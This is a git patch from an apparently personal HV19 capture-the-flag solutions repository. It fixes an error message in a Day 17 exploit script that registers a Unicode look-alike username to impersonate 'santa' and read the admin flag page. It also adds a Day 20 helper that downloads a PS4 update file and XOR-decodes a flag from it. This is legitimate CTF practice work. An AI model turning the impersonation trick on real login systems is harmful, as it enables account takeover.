From 45862b65901a573f9397eaefb4fae5c527bc9ba5 Mon Sep 17 00:00:00 2001 From: Roman Hergenreder Date: Sun, 29 Dec 2019 18:40:38 +0100 Subject: [PATCH] Day 20 + 17 fix --- Day 17/exploit.py | 6 +++--- Day 20/.gitignore | 1 + Day 20/decode.py | 31 +++++++++++++++++++++++++++++-- 3 files changed, 33 insertions(+), 5 deletions(-) create mode 100644 Day 20/.gitignore diff --git a/Day 17/exploit.py b/Day 17/exploit.py index a859fea..1744185 100644 --- a/Day 17/exploit.py +++ b/Day 17/exploit.py @@ -13,21 +13,21 @@ FLAG_PATTERN = re.compile("HV19\{[^}]*\}") # 1. register user santa res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD}) if res.status_code != 200 or "Registration successful!" not in res.text: - print("Server returned: %d %s" % (res.status_code, res.status_text)) + print("Server returned: %d %s" % (res.status_code, res.reason)) print(res.text) exit(1) # 2. login res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD}) if res.status_code != 200 or "username not found or wrong password!" in res.text: - print("Server returned: %d %s" % (res.status_code, res.status_text)) + print("Server returned: %d %s" % (res.status_code, res.reason)) print(res.text) exit(1) # 3. get flag res = SESSION.get(BASE_URL + "/admin.php") if res.status_code != 200 or "username not found or wrong password!" in res.text: - print("Server returned: %d %s" % (res.status_code, res.status_text)) + print("Server returned: %d %s" % (res.status_code, res.reason)) exit(1) print(FLAG_PATTERN.search(res.text)) diff --git a/Day 20/.gitignore b/Day 20/.gitignore new file mode 100644 index 0000000..ec2b23f --- /dev/null +++ b/Day 20/.gitignore @@ -0,0 +1 @@ +PS4UPDATE\.PUP diff --git a/Day 20/decode.py b/Day 20/decode.py index 980c818..39f58a2 100644 --- a/Day 20/decode.py +++ b/Day 20/decode.py @@ -1,9 +1,36 @@ +#!/usr/bin/python -byte_300 = [0xCE, 0x55, 0x95, 0x4E, 0x38, 0x0C5, 0x89, 0x0A5, 0x1B, 0x6F, 0x5E, 0x25, 0x0D2, 0x1D, 0x2A, 0x2B, 0x5E, 0x7B, 0x39, 0x14, 0x8E, 0x0D0, 0x0F0, 0x0F8, 0x0F8, 0x0A5] +import requests +import hashlib +import os +byte_300 = [0xCE, 0x55, 0x95, 0x4E, 0x38, 0x0C5, 0x89, 0x0A5, 0x1B, 0x6F, 0x5E, 0x25, 0x0D2, \ + 0x1D, 0x2A, 0x2B, 0x5E, 0x7B, 0x39, 0x14, 0x8E, 0x0D0, 0x0F0, 0x0F8, 0x0F8, 0x0A5] + +EXPECTED_HASH = "f86d4f9d2c049547bd61f942151ffb55" +INPUT_FILE = "PS4UPDATE.PUP" BUFFER_LENGTH = len(byte_300) -with open("PS4UPDATE.PUP", "rb") as f: +def downloadFile(): + print("Downloading file…") + res = requests.get("https://psarchive.darksoftware.xyz/505Retail.PUP") + if res.status_code != 200: + print("Server returned: %d %s" % (res.status_code, res.reason)) + exit(1) + + buffer = res.content + hash = hashlib.md5(buffer).hexdigest() + if hash != EXPECTED_HASH: + print("Hash does not match:", hash) + exit(1) + + with open(INPUT_FILE, "wb") as f: + f.write(buffer) + +if not os.path.isfile(INPUT_FILE): + downloadFile() + +with open(INPUT_FILE, "rb") as f: v29 = byte_300.copy() v14 = 4919;